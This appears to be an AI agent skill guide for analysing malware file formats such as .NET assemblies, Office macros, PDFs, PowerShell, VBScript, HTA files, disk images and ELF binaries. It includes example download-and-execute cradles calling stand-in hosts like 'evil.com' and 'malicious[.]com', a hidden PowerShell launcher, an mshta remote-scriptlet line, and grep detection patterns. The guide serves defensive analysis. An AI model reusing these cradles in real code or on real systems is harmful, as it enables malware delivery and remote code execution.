| name | specialized-file-analyzer |
| description | Analyze specialized file types beyond standard PE executables - .NET assemblies, Office macros, PDFs, PowerShell scripts, JavaScript, archives, HTA files, disk images (ISO/IMG/VHD/VHDX), and Linux ELF binaries. Use when you encounter documents, scripts, disk images, or non-Windows executables that require format-specific analysis tools and techniques. |
Specialized File Analyzer
Expert analysis of non-PE file formats commonly used in malware campaigns: .NET, Office documents, PDFs, scripts, HTA files, disk images, archives, and Linux binaries.
When to Use This Skill
Use this skill when analyzing:
- .NET/C# assemblies (.exe, .dll with .NET framework)
- Office documents with macros (.docm, .xlsm, .doc, .xls)
- PDF files (suspicious attachments, exploit documents)
- Scripts (PowerShell .ps1, VBScript .vbs, JavaScript .js)
- HTA files (.hta — HTML Applications executed by mshta.exe)
- Disk images (.iso, .img, .vhd, .vhdx — container formats that bypass MOTW)
- Archives (.zip, .rar, .7z, .tar.gz)
- Shortcuts (.lnk files)
- Linux binaries (ELF executables)
- Batch files (.bat, .cmd)
Key indicator: file command shows non-PE32 executable or document type.
Quick File Type Identification
file sample.bin
.NET / C# Assembly Analysis
Detection
file sample.exe | grep "Mono/.Net assembly"
strings sample.exe | grep "mscoree.dll"
pe-parser sample.exe | grep "CLR Runtime"
Tool: dnSpy (Windows - Primary Tool)
Download: https://github.com/dnSpy/dnSpy
Workflow:
- Open sample.exe in dnSpy
- Navigate: Assembly Explorer → sample.exe → Namespace → Classes
- Find entry point: Right-click assembly → Go to Entry Point
What to Look For:
Main() Function:
public static void Main(string[] args)
{
}
Suspicious Namespaces:
System.Net - Network operations (WebClient, HttpClient)
System.Security.Cryptography - Encryption/decryption
System.Reflection - Dynamic code loading
System.Diagnostics.Process - Process execution
System.IO - File operations
Microsoft.Win32 - Registry access
Common Malicious Patterns:
WebClient wc = new WebClient();
wc.DownloadFile("http://malicious.com/payload.exe", "C:\\temp\\payload.exe");
Process.Start("C:\\temp\\payload.exe");
byte[] decoded = Convert.FromBase64String(encodedPayload);
Assembly.Load(byte[] rawAssembly);
WriteProcessMemory(hProcess, lpBaseAddress, lpBuffer, nSize, out lpNumberOfBytesWritten);
Extract Embedded Resources:
Assembly Explorer → Right-click assembly → Resources
Look for:
- Embedded executables (byte arrays)
- Encrypted payloads
- Configuration data
- Icons (may hide data)
Right-click resource → Save
Deobfuscation:
de4dot sample.exe -o sample_deobfuscated.exe
Dynamic Debugging:
dnSpy: Debug → Start Debugging (F5)
Set breakpoints on suspicious functions
Step through execution (F10/F11)
Watch variables and decrypted strings
Tool: ILSpy (Cross-platform Alternative)
ilspycmd sample.exe -o output_directory/
ilspy sample.exe
Export decompiled code:
File → Save Code → C# Project
Analysis Checklist - .NET
Office Document / Macro Analysis
Detection
file document.docm
strings document.docm | grep -i "vba\|macro\|autoopen"
Tool: oledump.py (Primary - Didier Stevens)
Installation:
wget https://didierstevens.com/files/software/oledump_V0_0_70.zip
unzip oledump_V0_0_70.zip
Workflow:
1. List Streams:
python oledump.py document.docm
2. Extract Macro Code:
python oledump.py -s 3 -v document.docm
python oledump.py -s 3 --vbadecompresscorrupt document.docm
python oledump.py -s 3 -v document.docm > extracted_macro.vba
3. Analyze Macro Code:
Look for Auto-Execution Functions:
Sub AutoOpen() ' Word - runs on document open
Sub Document_Open() ' Word - runs on document open
Sub Workbook_Open() ' Excel - runs on workbook open
Sub Auto_Open() ' Excel - runs on workbook open
Look for Suspicious VBA Functions:
' Command execution
Shell("cmd.exe /c powershell ...")
CreateObject("WScript.Shell").Run "..."
' File download
CreateObject("MSXML2.XMLHTTP")
URLDownloadToFile ...
' File system operations
CreateObject("Scripting.FileSystemObject")
' Dynamic code execution
ExecuteStatement
Eval()
CallByName()
Tool: olevba (oletools Suite)
Installation:
pip install oletools
Automated Analysis:
olevba document.docm
olevba --decode document.docm
olevba -j document.docm > analysis.json
olevba --decode document.docm | grep -E "http|https|powershell|cmd|wscript"
Output Interpretation:
- AutoExec - Auto-execution keywords found
- Suspicious - Suspicious VBA keywords
- IOCs - URLs, IPs, file paths
- Hex Strings - Encoded data
- Base64 Strings - Encoded payloads
- Dridex Strings - Dridex malware indicators
Excel 4.0 Macros (XLM Macros)
More evasive than VBA macros!
python oledump.py document.xls | grep XL
git clone https://github.com/DissectMalware/XLMMacroDeobfuscator
python XLMMacroDeobfuscator.py -f document.xls
olevba document.xls --deobf
Modern Office Documents (.docx, .xlsx) - No Macros
Template Injection Attack:
unzip document.docx -d extracted/
cat extracted/word/_rels/document.xml.rels | grep "http"
Embedded Objects:
ls extracted/word/embeddings/
file extracted/word/embeddings/*
Analysis Checklist - Office Documents
PDF Analysis
Detection
file document.pdf
Tool: pdfid.py (Didier Stevens)
Quick Triage:
python pdfid.py document.pdf
Example Output:
PDFiD 0.2.7 document.pdf
PDF Header: %PDF-1.7
obj 45
endobj 45
stream 12
endstream 12
/Page 5
/Encrypt 0
/ObjStm 0
/JS 3 ← Suspicious!
/JavaScript 2 ← Suspicious!
/AA 1 ← Auto-action present!
/OpenAction 1 ← Executes on open!
/Launch 0
/EmbeddedFile 0
/RichMedia 0
Tool: pdf-parser.py (Didier Stevens)
Extract JavaScript:
python pdf-parser.py --search javascript document.pdf
python pdf-parser.py --object 15 document.pdf
python pdf-parser.py --object 15 --raw document.pdf > extracted_js.txt
python pdf-parser.py --filter document.pdf
Tool: peepdf (Interactive Analysis)
pip install peepdf-3
peepdf -i document.pdf
> tree
> object 15
> stream 15
> javascript
> extract stream 15 > payload.bin
PDF Exploits
Common CVEs:
- CVE-2013-2729 - JavaScript heap spray
- CVE-2010-0188 - libtiff buffer overflow
- CVE-2009-0927 - JBIG2Decode heap overflow
- CVE-2023-21608 - Adobe Acrobat use-after-free (remote code execution)
- CVE-2023-26369 - Adobe Acrobat out-of-bounds write (actively exploited in the wild)
- CVE-2024-4367 - PDF.js arbitrary JavaScript execution in Firefox (affects web-based PDF viewers)
- CVE-2023-36664 - Ghostscript command injection via crafted PDF (affects Linux/server-side rendering)
Shellcode Detection:
python pdf-parser.py --raw --filter document.pdf | grep -E "(\x90{10}|\xeb)"
python pdf-parser.py --object <id> --raw document.pdf | hexdump -C
Analysis Checklist - PDF
PowerShell / Script Analysis
PowerShell (.ps1) Deobfuscation
Common Obfuscation Patterns:
Base64 Encoding:
# Encoded command execution
powershell.exe -EncodedCommand <base64_string>
# Decode manually
$encoded = "Base64StringHere"
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded))
String Concatenation:
$url = "ht" + "tp://" + "evil.com"
Compression:
$ms = New-Object IO.MemoryStream
$ms.Write([Convert]::FromBase64String($compressed), 0, $compressedLength)
$ms.Seek(0,0) | Out-Null
$cs = New-Object IO.Compression.GZipStream($ms, [IO.Compression.CompressionMode]::Decompress)
Tool: PSDecode
git clone https://github.com/R3MRUM/PSDecode
Import-Module .\PSDecode.ps1
PSDecode -InputFile malicious.ps1 -OutputFile decoded.txt
Manual Analysis:
# Read script without executing
Get-Content malicious.ps1
# Search for key indicators
Select-String -Path malicious.ps1 -Pattern "Invoke-Expression|IEX|DownloadString|DownloadFile|FromBase64String"
Suspicious PowerShell Patterns:
Invoke-Expression / IEX - Execute string as code
Invoke-WebRequest / Invoke-RestMethod - Download content
DownloadString / DownloadFile - Download payloads
FromBase64String - Decode embedded payload
IO.Compression.GzipStream - Decompress payload
Reflection.Assembly]::Load - Load assembly from memory
-EncodedCommand - Base64 encoded command
-WindowStyle Hidden - Hide window
-ExecutionPolicy Bypass - Bypass script execution policy
VBScript (.vbs) Analysis
Common Obfuscation Techniques:
Chr() Concatenation:
' Characters assembled from ASCII codes to hide strings
Dim cmd
cmd = Chr(99) & Chr(109) & Chr(100) ' = "cmd"
CreateObject("WScript.Shell").Run cmd & ".exe /c " & Chr(112) & Chr(105) & Chr(110) & Chr(103) & " evil.com"
Execute / ExecuteGlobal:
' Execute() runs a string as code in the current scope
' ExecuteGlobal() runs a string as code in the global scope
Dim payload
payload = "CreateObject(" & Chr(34) & "WScript.Shell" & Chr(34) & ").Run " & Chr(34) & "calc.exe" & Chr(34)
Execute(payload)
' Chained: decode then execute
ExecuteGlobal(Base64Decode(encodedPayload))
String Reversal with StrReverse:
' String stored backwards to evade signature detection
Dim hidden
hidden = "elbatius/c/ exe.dmc"
CreateObject("WScript.Shell").Run StrReverse(hidden)
Replace() Chains:
' Junk characters inserted and stripped at runtime
Dim url
url = "hXXXtXXXtXXXpXXX:XXXXX//evil.com/payload.exe"
url = Replace(url, "XXX", "") ' = "http://evil.com/payload.exe"
WScript.Shell via GetObject:
' Alternative to CreateObject — avoids direct string "WScript.Shell"
Set sh = GetObject("new:{72C24DD5-D70A-438B-8A42-98424B88AFB8}")
sh.Run "powershell -nop -w hidden -enc <base64>"
Deobfuscation Approach:
Manual Chr() Resolution:
grep -oE "Chr\([0-9]+\)" malicious.vbs | sort -u
python3 -c "
import re, sys
code = open('malicious.vbs').read()
for m in re.finditer(r'Chr\((\d+)\)', code):
print(f'Chr({m.group(1)}) = {chr(int(m.group(1)))}')
"
Extract Execute() Payloads:
' SAFE deobfuscation technique:
' Replace Execute() / ExecuteGlobal() with WScript.Echo() to print payload instead of running it
' Original:
Execute(decodedPayload)
' Change to:
WScript.Echo(decodedPayload)
' Then run in a safe environment to reveal the next stage
cscript /nologo malicious_safe.vbs
Variable Substitution Tracing:
grep -n "=" malicious.vbs | grep -v "'.*="
Key Suspicious Patterns:
CreateObject("WScript.Shell") - Execute OS commands, launch processes
GetObject("winmgmts:") - WMI access (process creation, system enumeration)
Shell.Application - Explorer shell invocation (can bypass some restrictions)
ADODB.Stream - Binary file writes (used to drop PE payloads to disk)
MSXML2.XMLHTTP / WinHttp.WinHttpRequest - HTTP download cradles
Scripting.FileSystemObject - File system reads and writes
Execute / ExecuteGlobal / Eval - Dynamic code execution (always deobfuscate before analyzing)
StrReverse / Chr() / Replace() - String obfuscation primitives
Analysis:
cat malicious.vbs
grep -i "CreateObject\|WScript.Shell\|MSXML2.XMLHTTP\|Eval\|Execute\|ExecuteGlobal\|ADODB.Stream\|GetObject\|StrReverse" malicious.vbs
JavaScript (.js) Analysis
cat malicious.js | js-beautify > beautified.js
Suspicious Patterns:
eval(encodedCode);
unescape("%75%6E%65%73%63%61%70%65");
decodeURIComponent("%20");
var shell = new ActiveXObject("WScript.Shell");
shell.Run("cmd.exe /c ...");
var fso = new ActiveXObject("Scripting.FileSystemObject");
Analysis Checklist - Scripts
Archive Analysis
Safe Inspection (No Extraction)
7z l archive.zip
unzip -l archive.zip
tar -tzf archive.tar.gz
rar l archive.rar
Extract Safely
mkdir /tmp/extracted_archive
cd /tmp/extracted_archive
7z x ../archive.zip
unzip ../archive.zip
tar -xzf ../archive.tar.gz
file *
Password-Protected Archives
Common passwords in malware:
infected
malware
virus
2024 / 2025
123456
7z x -pinfected archive.zip
unzip -P infected archive.zip
LNK (Shortcut) File Analysis
Tool: LECmd (Windows)
# Download from: https://ericzimmerman.github.io/
LECmd.exe -f malicious.lnk
Tool: lnkinfo (Linux)
lnkinfo malicious.lnk
Manual Strings Analysis:
strings malicious.lnk | grep -E "\.exe|\.dll|http|powershell|cmd"
Analysis Checklist - Archives
HTA (HTML Application) Analysis
What HTA Files Are
HTA files (.hta) are HTML documents executed by mshta.exe (Microsoft HTML Application Host) rather than a web browser. Because mshta.exe is a trusted Windows binary, HTAs run with the full privileges of the current user and have unrestricted access to COM objects, ActiveX controls, and the local file system — none of the browser sandbox restrictions apply. This makes HTAs a popular delivery vehicle for malware, often distributed via phishing emails or dropped inside ISO/ZIP archives.
MITRE ATT&CK: T1218.005 — System Binary Proxy Execution: Mshta
Detection
file suspicious.hta
strings suspicious.hta | grep -iE "mshta|WScript|Shell|ActiveX|XMLHTTP|powershell"
Analysis Approach
HTAs are plain text — open them in any text editor or IDE. The analysis goal is to extract and understand all embedded scripts before any execution occurs.
1. Extract Embedded Scripts
cat suspicious.hta
grep -i "<script" suspicious.hta
grep -A 50 "<script" suspicious.hta
2. Check for ActiveX Object Instantiation
ActiveX objects are the primary attack surface in HTAs. Flag every CreateObject and new ActiveXObject call:
' VBScript - common ActiveX patterns
Set sh = CreateObject("WScript.Shell") ' OS command execution
Set fso = CreateObject("Scripting.FileSystemObject") ' File I/O
Set xhr = CreateObject("MSXML2.XMLHTTP") ' HTTP download
Set xhr = CreateObject("WinHttp.WinHttpRequest.5.1") ' Alternative HTTP
var sh = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
3. Look for High-Priority Execution Sinks
grep -iE "Shell\.Run|ShellExecute|WScript\.Shell|Scripting\.FileSystemObject|XMLHTTP|WinHttp|powershell|cmd\.exe|wscript|cscript|regsvr32|rundll32|msiexec" suspicious.hta
4. Decode Obfuscated Payloads
HTA malware frequently encodes payloads in innerHTML, script variables, or injected DOM content:
grep -oE "[A-Za-z0-9+/]{40,}={0,2}" suspicious.hta
grep -oE "&#[0-9]+;" suspicious.hta
grep -oE "%[0-9A-Fa-f]{2}" suspicious.hta
Decode base64 payload (Linux):
echo "Base64StringHere" | base64 -d > decoded_payload.bin
file decoded_payload.bin
Decode base64 payload (PowerShell — for Unicode-encoded commands):
[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("Base64StringHere"))
Common Malware Patterns
Download-and-Execute via XMLHTTP:
Set xhr = CreateObject("MSXML2.XMLHTTP")
xhr.Open "GET", "http://malicious[.]com/payload.exe", False
xhr.Send
Set stream = CreateObject("ADODB.Stream")
stream.Type = 1 ' Binary
stream.Open
stream.Write xhr.responseBody
stream.SaveToFile "C:\Users\Public\payload.exe", 2
stream.Close
CreateObject("WScript.Shell").Run "C:\Users\Public\payload.exe"
PowerShell Invocation (common cradle):
CreateObject("WScript.Shell").Run "powershell -nop -w hidden -enc <base64>", 0, False
Payload hidden in innerHTML and read back at runtime:
<div id="data" style="display:none">TVqQAAMAAAAEAAAA...</div>
<script language="VBScript">
Dim raw
raw = document.getElementById("data").innerHTML
' decode and execute raw
</script>
mshta.exe executing inline script (seen in phishing URLs):
mshta.exe javascript:a=(GetObject("script:http://malicious[.]com/payload.sct")).Exec();close();
Tools
| Task | Tool |
|---|
| Read/edit HTA content | Any text editor (VS Code, Notepad++, vim) |
| DOM structure inspection | Browser dev tools (open as HTML — do NOT click Run) |
| Decode base64 strings | base64 -d (Linux), CyberChef |
| Chr()/VBS deobfuscation | Manual or cscript with Execute→Echo swap (see VBScript section) |
| Trace COM object calls | Process Monitor (filter on mshta.exe) — dynamic analysis VM only |
Analysis Checklist - HTA
Disk Image Analysis (ISO / IMG / VHD / VHDX)
Why Malware Uses Disk Images
Disk images are a primary MOTW (Mark-of-the-Web) bypass technique on Windows 10 and 11. When a file is downloaded from the internet, Windows attaches a Zone Identifier alternate data stream (Zone.Identifier:$DATA, Zone 3) to flag it as untrusted. Files extracted from a mounted disk image do not inherit the source image's MOTW, so payloads inside an ISO/VHD execute without SmartScreen prompts or Protected View restrictions.
Additionally, .iso files auto-mount as a virtual DVD drive on double-click in Windows 10+, and .vhd/.vhdx files auto-mount as a virtual disk — making the delivery seamless for the victim.
MITRE ATT&CK: T1553.005 — Subvert Trust Controls: Mark-of-the-Web Bypass
Detection
file suspicious.iso
file suspicious.img
file suspicious.vhd
file suspicious.vhdx
Analysis Approach
Always analyze disk images read-only and without executing any contained files outside an isolated VM.
Option A: Extract Without Mounting (Safest — 7-Zip)
Works on Linux, Windows, and macOS. No kernel interaction required.
7z l suspicious.iso
mkdir /tmp/iso_contents
7z x suspicious.iso -o/tmp/iso_contents/
file /tmp/iso_contents/*
find /tmp/iso_contents/ -type f | xargs file
Option B: Mount Read-Only (Linux)
sudo mkdir /mnt/suspicious_iso
sudo mount -o loop,ro suspicious.iso /mnt/suspicious_iso
ls -la /mnt/suspicious_iso/
find /mnt/suspicious_iso/ -type f
find /mnt/suspicious_iso/ -type f -exec file {} \;
cp -r /mnt/suspicious_iso/ /tmp/iso_extracted/
sudo umount /mnt/suspicious_iso
Option C: Mount Read-Only (Windows — analysis VM only)
# Mount as read-only virtual drive
$img = Mount-DiskImage -ImagePath "C:\analysis\suspicious.iso" -Access ReadOnly -PassThru
$driveLetter = ($img | Get-Volume).DriveLetter
# List all files including hidden
Get-ChildItem "${driveLetter}:\" -Recurse -Force | Select FullName, Attributes, Length
# Copy contents for analysis
Copy-Item "${driveLetter}:\*" "C:\analysis\extracted\" -Recurse -Force
# Dismount
Dismount-DiskImage -ImagePath "C:\analysis\suspicious.iso"
VHD/VHDX on Linux:
sudo apt install qemu-utils
qemu-img convert -f vpc suspicious.vhd suspicious_raw.img
sudo mount -o loop,ro suspicious_raw.img /mnt/vhd_mount/
What to Look For
1. LNK + Hidden DLL/EXE (Most Common Pattern)
The canonical ISO malware delivery pattern:
archive.iso/
Invoice.lnk <- Victim double-clicks this
document.pdf <- Decoy shown to victim
payload.dll <- Hidden (file attribute set); executed by LNK via rundll32
find /mnt/suspicious_iso/ -name ".*"
ls -la /mnt/suspicious_iso/
lnkinfo Invoice.lnk
strings Invoice.lnk | grep -E "\.exe|\.dll|rundll32|cmd|powershell"
2. Decoy Documents
Disk images frequently contain a visible, benign-looking document (PDF, DOCX) displayed to the victim while the payload runs in the background. Flag any document files and analyze them separately using the appropriate section of this skill.
3. File Naming Tricks
ls -la /mnt/suspicious_iso/
find /mnt/suspicious_iso/ -print | cat -v | grep -v "^[[:print:]]*$"
4. Autorun Configuration
cat /mnt/suspicious_iso/autorun.inf 2>/dev/null
Contained File Routing
Once files are extracted, route each to the appropriate analysis path:
| Extracted File Type | Next Step |
|---|
.lnk | LNK Analysis section (this skill) |
.dll / .exe (PE) | malware-triage then malware-dynamic-analysis |
.ps1 / .vbs / .js | Script Analysis section (this skill) |
.docm / .xlsm | Office Macro Analysis section (this skill) |
.hta | HTA Analysis section (this skill) |
Nested .zip / .iso | Repeat disk image / archive analysis |
Analysis Checklist - Disk Images
Linux / ELF Binary Analysis
Detection
file sample.bin
Static Analysis
ELF Header:
readelf -h sample.bin
Sections:
readelf -S sample.bin
Imported Libraries:
ldd sample.bin
Imported Symbols:
nm -D sample.bin
objdump -T sample.bin
nm -D sample.bin | grep -E "socket|connect|fork|exec|ptrace|system"
Strings:
strings -a sample.bin | grep -E "http|/tmp|/etc|passwd"
Dynamic Analysis (Linux)
strace - System Call Monitoring:
strace -f ./sample.bin 2>&1 | tee strace_output.txt
strace -e trace=network,file,process ./sample.bin
strace -e trace=open,read,write,close ./sample.bin
strace -e trace=socket,connect,send,recv ./sample.bin
ltrace - Library Call Monitoring:
ltrace -f ./sample.bin 2>&1 | tee ltrace_output.txt
Check for Packing:
readelf -S sample.bin | grep UPX
upx -d sample.bin -o sample_unpacked.bin
Analysis Checklist - ELF
Integration with Report Writing
Each file type contributes specific sections to the malware analysis report:
.NET Analysis →
- Decompiled code snippets
- Embedded resource descriptions
- Obfuscation techniques used
- Reflective loading mechanisms
Office Macros →
- Macro code (sanitized)
- Auto-execution methods
- Download URLs
- Payload dropping process
PDF Analysis →
- Embedded JavaScript
- Auto-action triggers
- Exploit CVEs (if applicable)
- Shellcode presence
Scripts →
- Deobfuscated code
- Execution flow
- Download cradles
- C2 communications
Archives/LNK →
- Archive structure
- Masquerading techniques
- LNK target analysis
- Social engineering aspects
HTA Files →
- Extracted VBScript/JScript
- ActiveX objects abused
- Download cradle URLs
- PowerShell invocation chains
Disk Images (ISO/VHD) →
- Container structure and hidden files
- MOTW bypass technique documented
- LNK target and payload relationship
- Decoy document identified
ELF Binaries →
- System calls used
- Network protocols
- Persistence mechanisms (cron, systemd)
- Rootkit indicators
Tool Quick Reference
| File Type | Primary Tool | Secondary Tool |
|---|
| .NET | dnSpy | ILSpy, de4dot |
| Office Macros | oledump.py | olevba, XLMMacroDeobfuscator |
| PDF | pdfid.py, pdf-parser.py | peepdf |
| PowerShell | PSDecode | Manual analysis |
| VBScript/JS | Text editor + analysis | js-beautify |
| HTA | Text editor + grep | CyberChef (decode), Process Monitor (dynamic) |
| ISO/IMG/VHD/VHDX | 7-Zip (extract), mount -o ro (Linux) | Mount-DiskImage (Windows), qemu-utils (VHD) |
| Archives | 7z, unzip, tar | - |
| LNK | LECmd (Win), lnkinfo (Linux) | strings |
| ELF | readelf, nm, objdump | strace, ltrace |
Best Practices
Do:
- Always identify file type first (
file command)
- Extract in isolated environments
- Document obfuscation techniques
- Save original and deobfuscated versions
- Test extracted IOCs for accuracy
- Cross-reference with VirusTotal/MalwareBazaar
Don't:
- Execute scripts without understanding them first
- Trust file extensions (check magic bytes)
- Skip deobfuscation steps
- Extract archives directly to important directories
- Assume password-protected = safe
Example Usage
User request: "I have a suspicious .docm file with macros, help me analyze it"
Workflow:
- Confirm file type (Office document)
- Use oledump.py to list streams
- Extract VBA macro code
- Identify auto-execution functions
- Decode obfuscated strings
- Extract download URLs and IOCs
- Document payload delivery method
- Prepare findings for report